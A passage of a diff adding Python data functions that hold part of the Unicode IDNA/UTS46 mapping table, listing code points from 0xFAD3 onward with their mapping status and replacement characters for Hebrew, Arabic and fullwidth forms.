(0xFAD3, 'M', '䀘'), + (0xFAD4, 'M', '䀹'), + (0xFAD5, 'M', '𥉉'), + (0xFAD6, 'M', '𥳐'), + (0xFAD7, 'M', '𧻓'), + (0xFAD8, 'M', '齃'), + (0xFAD9, 'M', 
'龎'), + (0xFADA, 'X'), + (0xFB00, 'M', 'ff'), + (0xFB01, 'M', 'fi'), + ] + +def _seg_44() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFB02, 'M', 'fl'), + (0xFB03, 'M', 'ffi'), + (0xFB04, 'M', 'ffl'), + (0xFB05, 'M', 'st'), + (0xFB07, 'X'), + (0xFB13, 'M', 'մն'), + (0xFB14, 'M', 'մե'), + (0xFB15, 'M', 'մի'), + (0xFB16, 'M', 'վն'), + (0xFB17, 'M', 'մխ'), + (0xFB18, 'X'), + (0xFB1D, 'M', 'יִ'), + (0xFB1E, 'V'), + (0xFB1F, 'M', 'ײַ'), + (0xFB20, 'M', 'ע'), + (0xFB21, 'M', 'א'), + (0xFB22, 'M', 'ד'), + (0xFB23, 'M', 'ה'), + (0xFB24, 'M', 'כ'), + (0xFB25, 'M', 'ל'), + (0xFB26, 'M', 'ם'), + (0xFB27, 'M', 'ר'), + (0xFB28, 'M', 'ת'), + (0xFB29, '3', '+'), + (0xFB2A, 'M', 'שׁ'), + (0xFB2B, 'M', 'שׂ'), + (0xFB2C, 'M', 'שּׁ'), + (0xFB2D, 'M', 'שּׂ'), + (0xFB2E, 'M', 'אַ'), + (0xFB2F, 'M', 'אָ'), + (0xFB30, 'M', 'אּ'), + (0xFB31, 'M', 'בּ'), + (0xFB32, 'M', 'גּ'), + (0xFB33, 'M', 'דּ'), + (0xFB34, 'M', 'הּ'), + (0xFB35, 'M', 'וּ'), + (0xFB36, 'M', 'זּ'), + (0xFB37, 'X'), + (0xFB38, 'M', 'טּ'), + (0xFB39, 'M', 'יּ'), + (0xFB3A, 'M', 'ךּ'), + (0xFB3B, 'M', 'כּ'), + (0xFB3C, 'M', 'לּ'), + (0xFB3D, 'X'), + (0xFB3E, 'M', 'מּ'), + (0xFB3F, 'X'), + (0xFB40, 'M', 'נּ'), + (0xFB41, 'M', 'סּ'), + (0xFB42, 'X'), + (0xFB43, 'M', 'ףּ'), + (0xFB44, 'M', 'פּ'), + (0xFB45, 'X'), + (0xFB46, 'M', 'צּ'), + (0xFB47, 'M', 'קּ'), + (0xFB48, 'M', 'רּ'), + (0xFB49, 'M', 'שּ'), + (0xFB4A, 'M', 'תּ'), + (0xFB4B, 'M', 'וֹ'), + (0xFB4C, 'M', 'בֿ'), + (0xFB4D, 'M', 'כֿ'), + (0xFB4E, 'M', 'פֿ'), + (0xFB4F, 'M', 'אל'), + (0xFB50, 'M', 'ٱ'), + (0xFB52, 'M', 'ٻ'), + (0xFB56, 'M', 'پ'), + (0xFB5A, 'M', 'ڀ'), + (0xFB5E, 'M', 'ٺ'), + (0xFB62, 'M', 'ٿ'), + (0xFB66, 'M', 'ٹ'), + (0xFB6A, 'M', 'ڤ'), + (0xFB6E, 'M', 'ڦ'), + (0xFB72, 'M', 'ڄ'), + (0xFB76, 'M', 'ڃ'), + (0xFB7A, 'M', 'چ'), + (0xFB7E, 'M', 'ڇ'), + (0xFB82, 'M', 'ڍ'), + (0xFB84, 'M', 'ڌ'), + (0xFB86, 'M', 'ڎ'), + (0xFB88, 'M', 'ڈ'), + (0xFB8A, 'M', 'ژ'), + (0xFB8C, 'M', 'ڑ'), + (0xFB8E, 'M', 'ک'), + (0xFB92, 'M', 'گ'), + (0xFB96, 'M', 'ڳ'), + (0xFB9A, 'M', 'ڱ'), + (0xFB9E, 'M', 'ں'), + (0xFBA0, 'M', 'ڻ'), + (0xFBA4, 'M', 'ۀ'), + (0xFBA6, 'M', 'ہ'), + (0xFBAA, 'M', 'ھ'), + (0xFBAE, 'M', 'ے'), + (0xFBB0, 'M', 'ۓ'), + (0xFBB2, 'V'), + (0xFBC3, 'X'), + (0xFBD3, 'M', 'ڭ'), + (0xFBD7, 'M', 'ۇ'), + (0xFBD9, 'M', 'ۆ'), + (0xFBDB, 'M', 'ۈ'), + (0xFBDD, 'M', 'ۇٴ'), + (0xFBDE, 'M', 'ۋ'), + ] + +def _seg_45() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFBE0, 'M', 'ۅ'), + (0xFBE2, 'M', 'ۉ'), + (0xFBE4, 'M', 'ې'), + (0xFBE8, 'M', 'ى'), + (0xFBEA, 'M', 'ئا'), + (0xFBEC, 'M', 'ئە'), + (0xFBEE, 'M', 'ئو'), + (0xFBF0, 'M', 'ئۇ'), + (0xFBF2, 'M', 'ئۆ'), + (0xFBF4, 'M', 'ئۈ'), + (0xFBF6, 'M', 'ئې'), + (0xFBF9, 'M', 'ئى'), + (0xFBFC, 'M', 'ی'), + (0xFC00, 'M', 'ئج'), + (0xFC01, 'M', 'ئح'), + (0xFC02, 'M', 'ئم'), + (0xFC03, 'M', 'ئى'), + (0xFC04, 'M', 'ئي'), + (0xFC05, 'M', 'بج'), + (0xFC06, 'M', 'بح'), + (0xFC07, 'M', 'بخ'), + (0xFC08, 'M', 'بم'), + (0xFC09, 'M', 'بى'), + (0xFC0A, 'M', 'بي'), + (0xFC0B, 'M', 'تج'), + (0xFC0C, 'M', 'تح'), + (0xFC0D, 'M', 'تخ'), + (0xFC0E, 'M', 'تم'), + (0xFC0F, 'M', 'تى'), + (0xFC10, 'M', 'تي'), + (0xFC11, 'M', 'ثج'), + (0xFC12, 'M', 'ثم'), + (0xFC13, 'M', 'ثى'), + (0xFC14, 'M', 'ثي'), + (0xFC15, 'M', 'جح'), + (0xFC16, 'M', 'جم'), + (0xFC17, 'M', 'حج'), + (0xFC18, 'M', 'حم'), + (0xFC19, 'M', 'خج'), + (0xFC1A, 'M', 'خح'), + (0xFC1B, 'M', 'خم'), + (0xFC1C, 'M', 'سج'), + (0xFC1D, 'M', 'سح'), + (0xFC1E, 'M', 'سخ'), + (0xFC1F, 'M', 'سم'), + (0xFC20, 'M', 'صح'), + (0xFC21, 'M', 'صم'), + (0xFC22, 'M', 'ضج'), + (0xFC23, 
'M', 'ضح'), + (0xFC24, 'M', 'ضخ'), + (0xFC25, 'M', 'ضم'), + (0xFC26, 'M', 'طح'), + (0xFC27, 'M', 'طم'), + (0xFC28, 'M', 'ظم'), + (0xFC29, 'M', 'عج'), + (0xFC2A, 'M', 'عم'), + (0xFC2B, 'M', 'غج'), + (0xFC2C, 'M', 'غم'), + (0xFC2D, 'M', 'فج'), + (0xFC2E, 'M', 'فح'), + (0xFC2F, 'M', 'فخ'), + (0xFC30, 'M', 'فم'), + (0xFC31, 'M', 'فى'), + (0xFC32, 'M', 'في'), + (0xFC33, 'M', 'قح'), + (0xFC34, 'M', 'قم'), + (0xFC35, 'M', 'قى'), + (0xFC36, 'M', 'قي'), + (0xFC37, 'M', 'كا'), + (0xFC38, 'M', 'كج'), + (0xFC39, 'M', 'كح'), + (0xFC3A, 'M', 'كخ'), + (0xFC3B, 'M', 'كل'), + (0xFC3C, 'M', 'كم'), + (0xFC3D, 'M', 'كى'), + (0xFC3E, 'M', 'كي'), + (0xFC3F, 'M', 'لج'), + (0xFC40, 'M', 'لح'), + (0xFC41, 'M', 'لخ'), + (0xFC42, 'M', 'لم'), + (0xFC43, 'M', 'لى'), + (0xFC44, 'M', 'لي'), + (0xFC45, 'M', 'مج'), + (0xFC46, 'M', 'مح'), + (0xFC47, 'M', 'مخ'), + (0xFC48, 'M', 'مم'), + (0xFC49, 'M', 'مى'), + (0xFC4A, 'M', 'مي'), + (0xFC4B, 'M', 'نج'), + (0xFC4C, 'M', 'نح'), + (0xFC4D, 'M', 'نخ'), + (0xFC4E, 'M', 'نم'), + (0xFC4F, 'M', 'نى'), + (0xFC50, 'M', 'ني'), + (0xFC51, 'M', 'هج'), + (0xFC52, 'M', 'هم'), + (0xFC53, 'M', 'هى'), + (0xFC54, 'M', 'هي'), + (0xFC55, 'M', 'يج'), + (0xFC56, 'M', 'يح'), + ] + +def _seg_46() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFC57, 'M', 'يخ'), + (0xFC58, 'M', 'يم'), + (0xFC59, 'M', 'يى'), + (0xFC5A, 'M', 'يي'), + (0xFC5B, 'M', 'ذٰ'), + (0xFC5C, 'M', 'رٰ'), + (0xFC5D, 'M', 'ىٰ'), + (0xFC5E, '3', ' ٌّ'), + (0xFC5F, '3', ' ٍّ'), + (0xFC60, '3', ' َّ'), + (0xFC61, '3', ' ُّ'), + (0xFC62, '3', ' ِّ'), + (0xFC63, '3', ' ّٰ'), + (0xFC64, 'M', 'ئر'), + (0xFC65, 'M', 'ئز'), + (0xFC66, 'M', 'ئم'), + (0xFC67, 'M', 'ئن'), + (0xFC68, 'M', 'ئى'), + (0xFC69, 'M', 'ئي'), + (0xFC6A, 'M', 'بر'), + (0xFC6B, 'M', 'بز'), + (0xFC6C, 'M', 'بم'), + (0xFC6D, 'M', 'بن'), + (0xFC6E, 'M', 'بى'), + (0xFC6F, 'M', 'بي'), + (0xFC70, 'M', 'تر'), + (0xFC71, 'M', 'تز'), + (0xFC72, 'M', 'تم'), + (0xFC73, 'M', 'تن'), + (0xFC74, 'M', 'تى'), + (0xFC75, 'M', 'تي'), + (0xFC76, 'M', 'ثر'), + (0xFC77, 'M', 'ثز'), + (0xFC78, 'M', 'ثم'), + (0xFC79, 'M', 'ثن'), + (0xFC7A, 'M', 'ثى'), + (0xFC7B, 'M', 'ثي'), + (0xFC7C, 'M', 'فى'), + (0xFC7D, 'M', 'في'), + (0xFC7E, 'M', 'قى'), + (0xFC7F, 'M', 'قي'), + (0xFC80, 'M', 'كا'), + (0xFC81, 'M', 'كل'), + (0xFC82, 'M', 'كم'), + (0xFC83, 'M', 'كى'), + (0xFC84, 'M', 'كي'), + (0xFC85, 'M', 'لم'), + (0xFC86, 'M', 'لى'), + (0xFC87, 'M', 'لي'), + (0xFC88, 'M', 'ما'), + (0xFC89, 'M', 'مم'), + (0xFC8A, 'M', 'نر'), + (0xFC8B, 'M', 'نز'), + (0xFC8C, 'M', 'نم'), + (0xFC8D, 'M', 'نن'), + (0xFC8E, 'M', 'نى'), + (0xFC8F, 'M', 'ني'), + (0xFC90, 'M', 'ىٰ'), + (0xFC91, 'M', 'ير'), + (0xFC92, 'M', 'يز'), + (0xFC93, 'M', 'يم'), + (0xFC94, 'M', 'ين'), + (0xFC95, 'M', 'يى'), + (0xFC96, 'M', 'يي'), + (0xFC97, 'M', 'ئج'), + (0xFC98, 'M', 'ئح'), + (0xFC99, 'M', 'ئخ'), + (0xFC9A, 'M', 'ئم'), + (0xFC9B, 'M', 'ئه'), + (0xFC9C, 'M', 'بج'), + (0xFC9D, 'M', 'بح'), + (0xFC9E, 'M', 'بخ'), + (0xFC9F, 'M', 'بم'), + (0xFCA0, 'M', 'به'), + (0xFCA1, 'M', 'تج'), + (0xFCA2, 'M', 'تح'), + (0xFCA3, 'M', 'تخ'), + (0xFCA4, 'M', 'تم'), + (0xFCA5, 'M', 'ته'), + (0xFCA6, 'M', 'ثم'), + (0xFCA7, 'M', 'جح'), + (0xFCA8, 'M', 'جم'), + (0xFCA9, 'M', 'حج'), + (0xFCAA, 'M', 'حم'), + (0xFCAB, 'M', 'خج'), + (0xFCAC, 'M', 'خم'), + (0xFCAD, 'M', 'سج'), + (0xFCAE, 'M', 'سح'), + (0xFCAF, 'M', 'سخ'), + (0xFCB0, 'M', 'سم'), + (0xFCB1, 'M', 'صح'), + (0xFCB2, 'M', 'صخ'), + (0xFCB3, 'M', 'صم'), + (0xFCB4, 'M', 'ضج'), + (0xFCB5, 'M', 'ضح'), + (0xFCB6, 'M', 'ضخ'), + (0xFCB7, 'M', 'ضم'), + (0xFCB8, 'M', 'طح'), + (0xFCB9, 'M', 'ظم'), 
+ (0xFCBA, 'M', 'عج'), + ] + +def _seg_47() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFCBB, 'M', 'عم'), + (0xFCBC, 'M', 'غج'), + (0xFCBD, 'M', 'غم'), + (0xFCBE, 'M', 'فج'), + (0xFCBF, 'M', 'فح'), + (0xFCC0, 'M', 'فخ'), + (0xFCC1, 'M', 'فم'), + (0xFCC2, 'M', 'قح'), + (0xFCC3, 'M', 'قم'), + (0xFCC4, 'M', 'كج'), + (0xFCC5, 'M', 'كح'), + (0xFCC6, 'M', 'كخ'), + (0xFCC7, 'M', 'كل'), + (0xFCC8, 'M', 'كم'), + (0xFCC9, 'M', 'لج'), + (0xFCCA, 'M', 'لح'), + (0xFCCB, 'M', 'لخ'), + (0xFCCC, 'M', 'لم'), + (0xFCCD, 'M', 'له'), + (0xFCCE, 'M', 'مج'), + (0xFCCF, 'M', 'مح'), + (0xFCD0, 'M', 'مخ'), + (0xFCD1, 'M', 'مم'), + (0xFCD2, 'M', 'نج'), + (0xFCD3, 'M', 'نح'), + (0xFCD4, 'M', 'نخ'), + (0xFCD5, 'M', 'نم'), + (0xFCD6, 'M', 'نه'), + (0xFCD7, 'M', 'هج'), + (0xFCD8, 'M', 'هم'), + (0xFCD9, 'M', 'هٰ'), + (0xFCDA, 'M', 'يج'), + (0xFCDB, 'M', 'يح'), + (0xFCDC, 'M', 'يخ'), + (0xFCDD, 'M', 'يم'), + (0xFCDE, 'M', 'يه'), + (0xFCDF, 'M', 'ئم'), + (0xFCE0, 'M', 'ئه'), + (0xFCE1, 'M', 'بم'), + (0xFCE2, 'M', 'به'), + (0xFCE3, 'M', 'تم'), + (0xFCE4, 'M', 'ته'), + (0xFCE5, 'M', 'ثم'), + (0xFCE6, 'M', 'ثه'), + (0xFCE7, 'M', 'سم'), + (0xFCE8, 'M', 'سه'), + (0xFCE9, 'M', 'شم'), + (0xFCEA, 'M', 'شه'), + (0xFCEB, 'M', 'كل'), + (0xFCEC, 'M', 'كم'), + (0xFCED, 'M', 'لم'), + (0xFCEE, 'M', 'نم'), + (0xFCEF, 'M', 'نه'), + (0xFCF0, 'M', 'يم'), + (0xFCF1, 'M', 'يه'), + (0xFCF2, 'M', 'ـَّ'), + (0xFCF3, 'M', 'ـُّ'), + (0xFCF4, 'M', 'ـِّ'), + (0xFCF5, 'M', 'طى'), + (0xFCF6, 'M', 'طي'), + (0xFCF7, 'M', 'عى'), + (0xFCF8, 'M', 'عي'), + (0xFCF9, 'M', 'غى'), + (0xFCFA, 'M', 'غي'), + (0xFCFB, 'M', 'سى'), + (0xFCFC, 'M', 'سي'), + (0xFCFD, 'M', 'شى'), + (0xFCFE, 'M', 'شي'), + (0xFCFF, 'M', 'حى'), + (0xFD00, 'M', 'حي'), + (0xFD01, 'M', 'جى'), + (0xFD02, 'M', 'جي'), + (0xFD03, 'M', 'خى'), + (0xFD04, 'M', 'خي'), + (0xFD05, 'M', 'صى'), + (0xFD06, 'M', 'صي'), + (0xFD07, 'M', 'ضى'), + (0xFD08, 'M', 'ضي'), + (0xFD09, 'M', 'شج'), + (0xFD0A, 'M', 'شح'), + (0xFD0B, 'M', 'شخ'), + (0xFD0C, 'M', 'شم'), + (0xFD0D, 'M', 'شر'), + (0xFD0E, 'M', 'سر'), + (0xFD0F, 'M', 'صر'), + (0xFD10, 'M', 'ضر'), + (0xFD11, 'M', 'طى'), + (0xFD12, 'M', 'طي'), + (0xFD13, 'M', 'عى'), + (0xFD14, 'M', 'عي'), + (0xFD15, 'M', 'غى'), + (0xFD16, 'M', 'غي'), + (0xFD17, 'M', 'سى'), + (0xFD18, 'M', 'سي'), + (0xFD19, 'M', 'شى'), + (0xFD1A, 'M', 'شي'), + (0xFD1B, 'M', 'حى'), + (0xFD1C, 'M', 'حي'), + (0xFD1D, 'M', 'جى'), + (0xFD1E, 'M', 'جي'), + ] + +def _seg_48() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFD1F, 'M', 'خى'), + (0xFD20, 'M', 'خي'), + (0xFD21, 'M', 'صى'), + (0xFD22, 'M', 'صي'), + (0xFD23, 'M', 'ضى'), + (0xFD24, 'M', 'ضي'), + (0xFD25, 'M', 'شج'), + (0xFD26, 'M', 'شح'), + (0xFD27, 'M', 'شخ'), + (0xFD28, 'M', 'شم'), + (0xFD29, 'M', 'شر'), + (0xFD2A, 'M', 'سر'), + (0xFD2B, 'M', 'صر'), + (0xFD2C, 'M', 'ضر'), + (0xFD2D, 'M', 'شج'), + (0xFD2E, 'M', 'شح'), + (0xFD2F, 'M', 'شخ'), + (0xFD30, 'M', 'شم'), + (0xFD31, 'M', 'سه'), + (0xFD32, 'M', 'شه'), + (0xFD33, 'M', 'طم'), + (0xFD34, 'M', 'سج'), + (0xFD35, 'M', 'سح'), + (0xFD36, 'M', 'سخ'), + (0xFD37, 'M', 'شج'), + (0xFD38, 'M', 'شح'), + (0xFD39, 'M', 'شخ'), + (0xFD3A, 'M', 'طم'), + (0xFD3B, 'M', 'ظم'), + (0xFD3C, 'M', 'اً'), + (0xFD3E, 'V'), + (0xFD50, 'M', 'تجم'), + (0xFD51, 'M', 'تحج'), + (0xFD53, 'M', 'تحم'), + (0xFD54, 'M', 'تخم'), + (0xFD55, 'M', 'تمج'), + (0xFD56, 'M', 'تمح'), + (0xFD57, 'M', 'تمخ'), + (0xFD58, 'M', 'جمح'), + (0xFD5A, 'M', 'حمي'), + (0xFD5B, 'M', 'حمى'), + (0xFD5C, 'M', 'سحج'), + (0xFD5D, 'M', 'سجح'), + (0xFD5E, 'M', 'سجى'), + (0xFD5F, 'M', 'سمح'), + (0xFD61, 
'M', 'سمج'), + (0xFD62, 'M', 'سمم'), + (0xFD64, 'M', 'صحح'), + (0xFD66, 'M', 'صمم'), + (0xFD67, 'M', 'شحم'), + (0xFD69, 'M', 'شجي'), + (0xFD6A, 'M', 'شمخ'), + (0xFD6C, 'M', 'شمم'), + (0xFD6E, 'M', 'ضحى'), + (0xFD6F, 'M', 'ضخم'), + (0xFD71, 'M', 'طمح'), + (0xFD73, 'M', 'طمم'), + (0xFD74, 'M', 'طمي'), + (0xFD75, 'M', 'عجم'), + (0xFD76, 'M', 'عمم'), + (0xFD78, 'M', 'عمى'), + (0xFD79, 'M', 'غمم'), + (0xFD7A, 'M', 'غمي'), + (0xFD7B, 'M', 'غمى'), + (0xFD7C, 'M', 'فخم'), + (0xFD7E, 'M', 'قمح'), + (0xFD7F, 'M', 'قمم'), + (0xFD80, 'M', 'لحم'), + (0xFD81, 'M', 'لحي'), + (0xFD82, 'M', 'لحى'), + (0xFD83, 'M', 'لجج'), + (0xFD85, 'M', 'لخم'), + (0xFD87, 'M', 'لمح'), + (0xFD89, 'M', 'محج'), + (0xFD8A, 'M', 'محم'), + (0xFD8B, 'M', 'محي'), + (0xFD8C, 'M', 'مجح'), + (0xFD8D, 'M', 'مجم'), + (0xFD8E, 'M', 'مخج'), + (0xFD8F, 'M', 'مخم'), + (0xFD90, 'X'), + (0xFD92, 'M', 'مجخ'), + (0xFD93, 'M', 'همج'), + (0xFD94, 'M', 'همم'), + (0xFD95, 'M', 'نحم'), + (0xFD96, 'M', 'نحى'), + (0xFD97, 'M', 'نجم'), + (0xFD99, 'M', 'نجى'), + (0xFD9A, 'M', 'نمي'), + (0xFD9B, 'M', 'نمى'), + (0xFD9C, 'M', 'يمم'), + (0xFD9E, 'M', 'بخي'), + (0xFD9F, 'M', 'تجي'), + (0xFDA0, 'M', 'تجى'), + (0xFDA1, 'M', 'تخي'), + (0xFDA2, 'M', 'تخى'), + (0xFDA3, 'M', 'تمي'), + (0xFDA4, 'M', 'تمى'), + (0xFDA5, 'M', 'جمي'), + (0xFDA6, 'M', 'جحى'), + ] + +def _seg_49() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFDA7, 'M', 'جمى'), + (0xFDA8, 'M', 'سخى'), + (0xFDA9, 'M', 'صحي'), + (0xFDAA, 'M', 'شحي'), + (0xFDAB, 'M', 'ضحي'), + (0xFDAC, 'M', 'لجي'), + (0xFDAD, 'M', 'لمي'), + (0xFDAE, 'M', 'يحي'), + (0xFDAF, 'M', 'يجي'), + (0xFDB0, 'M', 'يمي'), + (0xFDB1, 'M', 'ممي'), + (0xFDB2, 'M', 'قمي'), + (0xFDB3, 'M', 'نحي'), + (0xFDB4, 'M', 'قمح'), + (0xFDB5, 'M', 'لحم'), + (0xFDB6, 'M', 'عمي'), + (0xFDB7, 'M', 'كمي'), + (0xFDB8, 'M', 'نجح'), + (0xFDB9, 'M', 'مخي'), + (0xFDBA, 'M', 'لجم'), + (0xFDBB, 'M', 'كمم'), + (0xFDBC, 'M', 'لجم'), + (0xFDBD, 'M', 'نجح'), + (0xFDBE, 'M', 'جحي'), + (0xFDBF, 'M', 'حجي'), + (0xFDC0, 'M', 'مجي'), + (0xFDC1, 'M', 'فمي'), + (0xFDC2, 'M', 'بحي'), + (0xFDC3, 'M', 'كمم'), + (0xFDC4, 'M', 'عجم'), + (0xFDC5, 'M', 'صمم'), + (0xFDC6, 'M', 'سخي'), + (0xFDC7, 'M', 'نجي'), + (0xFDC8, 'X'), + (0xFDCF, 'V'), + (0xFDD0, 'X'), + (0xFDF0, 'M', 'صلے'), + (0xFDF1, 'M', 'قلے'), + (0xFDF2, 'M', 'الله'), + (0xFDF3, 'M', 'اكبر'), + (0xFDF4, 'M', 'محمد'), + (0xFDF5, 'M', 'صلعم'), + (0xFDF6, 'M', 'رسول'), + (0xFDF7, 'M', 'عليه'), + (0xFDF8, 'M', 'وسلم'), + (0xFDF9, 'M', 'صلى'), + (0xFDFA, '3', 'صلى الله عليه وسلم'), + (0xFDFB, '3', 'جل جلاله'), + (0xFDFC, 'M', 'ریال'), + (0xFDFD, 'V'), + (0xFE00, 'I'), + (0xFE10, '3', ','), + (0xFE11, 'M', '、'), + (0xFE12, 'X'), + (0xFE13, '3', ':'), + (0xFE14, '3', ';'), + (0xFE15, '3', '!'), + (0xFE16, '3', '?'), + (0xFE17, 'M', '〖'), + (0xFE18, 'M', '〗'), + (0xFE19, 'X'), + (0xFE20, 'V'), + (0xFE30, 'X'), + (0xFE31, 'M', '—'), + (0xFE32, 'M', '–'), + (0xFE33, '3', '_'), + (0xFE35, '3', '('), + (0xFE36, '3', ')'), + (0xFE37, '3', '{'), + (0xFE38, '3', '}'), + (0xFE39, 'M', '〔'), + (0xFE3A, 'M', '〕'), + (0xFE3B, 'M', '【'), + (0xFE3C, 'M', '】'), + (0xFE3D, 'M', '《'), + (0xFE3E, 'M', '》'), + (0xFE3F, 'M', '〈'), + (0xFE40, 'M', '〉'), + (0xFE41, 'M', '「'), + (0xFE42, 'M', '」'), + (0xFE43, 'M', '『'), + (0xFE44, 'M', '』'), + (0xFE45, 'V'), + (0xFE47, '3', '['), + (0xFE48, '3', ']'), + (0xFE49, '3', ' ̅'), + (0xFE4D, '3', '_'), + (0xFE50, '3', ','), + (0xFE51, 'M', '、'), + (0xFE52, 'X'), + (0xFE54, '3', ';'), + (0xFE55, '3', ':'), + (0xFE56, '3', '?'), + (0xFE57, '3', '!'), + (0xFE58, 'M', '—'), + 
(0xFE59, '3', '('), + (0xFE5A, '3', ')'), + (0xFE5B, '3', '{'), + (0xFE5C, '3', '}'), + (0xFE5D, 'M', '〔'), + ] + +def _seg_50() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFE5E, 'M', '〕'), + (0xFE5F, '3', '#'), + (0xFE60, '3', '&'), + (0xFE61, '3', '*'), + (0xFE62, '3', '+'), + (0xFE63, 'M', '-'), + (0xFE64, '3', '<'), + (0xFE65, '3', '>'), + (0xFE66, '3', '='), + (0xFE67, 'X'), + (0xFE68, '3', '\\'), + (0xFE69, '3', '$'), + (0xFE6A, '3', '%'), + (0xFE6B, '3', '@'), + (0xFE6C, 'X'), + (0xFE70, '3', ' ً'), + (0xFE71, 'M', 'ـً'), + (0xFE72, '3', ' ٌ'), + (0xFE73, 'V'), + (0xFE74, '3', ' ٍ'), + (0xFE75, 'X'), + (0xFE76, '3', ' َ'), + (0xFE77, 'M', 'ـَ'), + (0xFE78, '3', ' ُ'), + (0xFE79, 'M', 'ـُ'), + (0xFE7A, '3', ' ِ'), + (0xFE7B, 'M', 'ـِ'), + (0xFE7C, '3', ' ّ'), + (0xFE7D, 'M', 'ـّ'), + (0xFE7E, '3', ' ْ'), + (0xFE7F, 'M', 'ـْ'), + (0xFE80, 'M', 'ء'), + (0xFE81, 'M', 'آ'), + (0xFE83, 'M', 'أ'), + (0xFE85, 'M', 'ؤ'), + (0xFE87, 'M', 'إ'), + (0xFE89, 'M', 'ئ'), + (0xFE8D, 'M', 'ا'), + (0xFE8F, 'M', 'ب'), + (0xFE93, 'M', 'ة'), + (0xFE95, 'M', 'ت'), + (0xFE99, 'M', 'ث'), + (0xFE9D, 'M', 'ج'), + (0xFEA1, 'M', 'ح'), + (0xFEA5, 'M', 'خ'), + (0xFEA9, 'M', 'د'), + (0xFEAB, 'M', 'ذ'), + (0xFEAD, 'M', 'ر'), + (0xFEAF, 'M', 'ز'), + (0xFEB1, 'M', 'س'), + (0xFEB5, 'M', 'ش'), + (0xFEB9, 'M', 'ص'), + (0xFEBD, 'M', 'ض'), + (0xFEC1, 'M', 'ط'), + (0xFEC5, 'M', 'ظ'), + (0xFEC9, 'M', 'ع'), + (0xFECD, 'M', 'غ'), + (0xFED1, 'M', 'ف'), + (0xFED5, 'M', 'ق'), + (0xFED9, 'M', 'ك'), + (0xFEDD, 'M', 'ل'), + (0xFEE1, 'M', 'م'), + (0xFEE5, 'M', 'ن'), + (0xFEE9, 'M', 'ه'), + (0xFEED, 'M', 'و'), + (0xFEEF, 'M', 'ى'), + (0xFEF1, 'M', 'ي'), + (0xFEF5, 'M', 'لآ'), + (0xFEF7, 'M', 'لأ'), + (0xFEF9, 'M', 'لإ'), + (0xFEFB, 'M', 'لا'), + (0xFEFD, 'X'), + (0xFEFF, 'I'), + (0xFF00, 'X'), + (0xFF01, '3', '!'), + (0xFF02, '3', '"'), + (0xFF03, '3', '#'), + (0xFF04, '3', '$'), + (0xFF05, '3', '%'), + (0xFF06, '3', '&'), + (0xFF07, '3', '\''), + (0xFF08, '3', '('), + (0xFF09, '3', ')'), + (0xFF0A, '3', '*'), + (0xFF0B, '3', '+'), + (0xFF0C, '3', ','), + (0xFF0D, 'M', '-'), + (0xFF0E, 'M', '.'), + (0xFF0F, '3', '/'), + (0xFF10, 'M', '0'), + (0xFF11, 'M', '1'), + (0xFF12, 'M', '2'), + (0xFF13, 'M', '3'), + (0xFF14, 'M', '4'), + (0xFF15, 'M', '5'), + (0xFF16, 'M', '6'), + (0xFF17, 'M', '7'), + (0xFF18, 'M', '8'), + (0xFF19, 'M', '9'), + (0xFF1A, '3', ':'), + ] + +def _seg_51() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFF1B, '3', ';'), + (0xFF1C, '3', '<'), + (0xFF1D, '3', '='), + (0xFF1E, '3', '>'), + (0xFF1F, '3', '?'), + (0xFF20, '3', '@'), + (0xFF21, 'M', 'a'), + (0xFF22, 'M', 'b'), + (0xFF23, 'M', 'c'), + (0xFF24, 'M', 'd'), + (0xFF25, 'M', 'e'), + (0xFF26, 'M', 'f'), + (0xFF27, 'M', 'g'), + (0xFF28, 'M', 'h'), + (0xFF29, 'M', 'i'), + (0xFF2A, 'M', 'j'), + (0xFF2B, 'M', 'k'), + (0xFF2C, 'M', 'l'), + (0xFF2D, 'M', 'm'), + (0xFF2E, 'M', 'n'), + (0xFF2F, 'M', 'o'), + (0xFF30, 'M', 'p'), + (0xFF31, 'M', 'q'), + (0xFF32, 'M', 'r'), + (0xFF33, 'M', 's'), + (0xFF34, 'M', 't'), + (0xFF35, 'M', 'u'), + (0xFF36, 'M', 'v'), + (0xFF37, 'M', 'w'), + (0xFF38, 'M', 'x'), + (0xFF39, 'M', 'y'), + (0xFF3A, 'M', 'z'), + (0xFF3B, '3', '['), + (0xFF3C, '3', '\\'), + (0xFF3D, '3', ']'), + (0xFF3E, '3', '^'), + (0xFF3F, '3', '_'), + (0xFF40, '3', '`'), + (0xFF41, 'M', 'a'), + (0xFF42, 'M', 'b'), + (0xFF43, 'M', 'c'), + (0xFF44, 'M', 'd'), + (0xFF45, 'M', 'e'), + (0xFF46, 'M', 'f'), + (0xFF47, 'M', 'g'), + (0xFF48, 'M', 'h'), + (0xFF49, 'M', 'i'), + (0xFF4A, 'M', 'j'), + (0xFF4B, 'M', 'k'), + 
(0xFF4C, 'M', 'l'), + (0xFF4D, 'M', 'm'), + (0xFF4E, 'M', 'n'), + (0xFF4F, 'M', 'o'), + (0xFF50, 'M', 'p'), + (0xFF51, 'M', 'q'), + (0xFF52, 'M', 'r'), + (0xFF53, 'M', 's'), + (0xFF54, 'M', 't'), + (0xFF55, 'M', 'u'), + (0xFF56, 'M', 'v'), + (0xFF57, 'M', 'w'), + (0xFF58, 'M', 'x'), + (0xFF59, 'M', 'y'), + (0xFF5A, 'M', 'z'), + (0xFF5B, '3', '{'), + (0xFF5C, '3', '|'), + (0xFF5D, '3', '}'), + (0xFF5E, '3', '~'), + (0xFF5F, 'M', '⦅'), + (0xFF60, 'M', '⦆'), + (0xFF61, 'M', '.'), + (0xFF62, 'M', '「'), + (0xFF63, 'M', '」'), + (0xFF64, 'M', '、'), + (0xFF65, 'M', '・'), + (0xFF66, 'M', 'ヲ'), + (0xFF67, 'M', 'ァ'), + (0xFF68, 'M', 'ィ'), + (0xFF69, 'M', 'ゥ'), + (0xFF6A, 'M', 'ェ'), + (0xFF6B, 'M', 'ォ'), + (0xFF6C, 'M', 'ャ'), + (0xFF6D, 'M', 'ュ'), + (0xFF6E, 'M', 'ョ'), + (0xFF6F, 'M', 